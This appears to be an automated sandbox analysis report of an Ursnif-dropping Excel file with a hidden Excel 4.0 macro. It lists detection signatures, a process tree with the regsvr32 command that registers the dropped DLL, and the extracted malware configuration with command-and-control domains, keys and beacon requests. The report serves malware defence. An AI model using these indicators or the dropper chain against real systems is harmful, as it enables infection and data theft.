Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report my_attach_82862.xlsb

Overview

General Information

Sample Name:my_attach_82862.xlsb
Analysis ID:433009
MD5:1f155a8f8c53066ef9dba8520cbcf346
SHA1:75dda503a5f1bbb11c8de9236ff237a7989e8e80
SHA256:29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Potential thread-based time evasion detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6180 cmdline: regsvr32 -s C:/Users/Public/SettingSyncY.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 6412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6436 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5448 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5724 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5308 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5516 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6200 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6012 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              Click to see the 5 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5988, ProcessCommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, ProcessId: 6180

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: https://quickbooks.aeymotors.com/soft.dllAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: 00000003.00000003.285300360.0000000003010000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
              Multi AV Scanner detection for domain / URLShow sources
              Source: authd.feronok.comVirustotal: Detection: 11%Perma Link
              Source: app.bighomegl.atVirustotal: Detection: 6%Perma Link
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
              Source: unknownHTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2
              Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: regsvr32.exe, soft[1].dll.0.dr

              Software Vulnerabilities:

              barindex
              Document exploit detected (creates forbidden files)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to behavior
              Document exploit detected (drops PE files)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: soft[1].dll.0.drJump to dropped file
              Document exploit detected (UrlDownloadToFile)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
              Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszfQOGO_2F/ebssg7ZOH9iTiK1egYa/TYvtl48FqSo7aXNnyk8zDn/0M4_2F1RU9EXO/TpeNu_2B/RPWPT_2BSfoiOaYRvUkNxcz/WR4a1P2fCQ/k1EnQMOdYbM0XsiH2/reukwmEF53hW/xa5HBUgFOAx/sGDiJ22uuBIopz/tZj9wmd1r7z3ANuAYbfIk/bhnJIJVnJvAXbS6_/2Fsif8yHgRIg6fa/a0BPP1Z_2FHpWsn1gk/fe5cFcowW/IKK9U HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.bighomegl.atConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: app.bighomegl.at
              Source: msapplication.xml0.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml0.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml5.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml5.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml7.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: msapplication.xml7.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: unknownDNS traffic detected: queries for: quickbooks.aeymotors.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Jun 2021 03:07:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
              Source: {C1F50A29-CAAD-11EB-90E4-ECF4BB862DED}.dat.34.drString found in binary or memory: http://app.bighomegl.at/8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8q
              Source: ~DF60CBFC830128400E.TMP.36.dr, {CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat.36.drString found in binary or memory: http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2
              Source: {B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.drString found in binary or memory: http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/
              Source: {99BBC3ED-CAAD-11EB-90E4-ECF4BB862DED}.dat.20.drString found in binary or memory: http://authd.feronok.com/j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszf
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: msapplication.xml.20.drString found in binary or memory: http://www.amazon.com/
              Source: msapplication.xml1.20.drString found in binary or memory: http://www.google.com/
              Source: msapplication.xml2.20.drString found in binary or memory: http://www.live.com/
              Source: msapplication.xml3.20.drString found in binary or memory: http://www.nytimes.com/
              Source: msapplication.xml4.20.drString found in binary or memory: http://www.reddit.com/
              Source: msapplication.xml5.20.drString found in binary or memory: http://www.twitter.com/
              Source: msapplication.xml6.20.drString found in binary or memory: http://www.wikipedia.com/
              Source: msapplication.xml7.20.drString found in binary or memory: http://www.youtube.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.aadrm.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.office.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.onedrive.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://augloop.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.entity.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://config.edge.skype.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cortana.ai/api
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cr.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dev.cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://devnull.onenote.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://directory.services.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.windows.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.windows.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
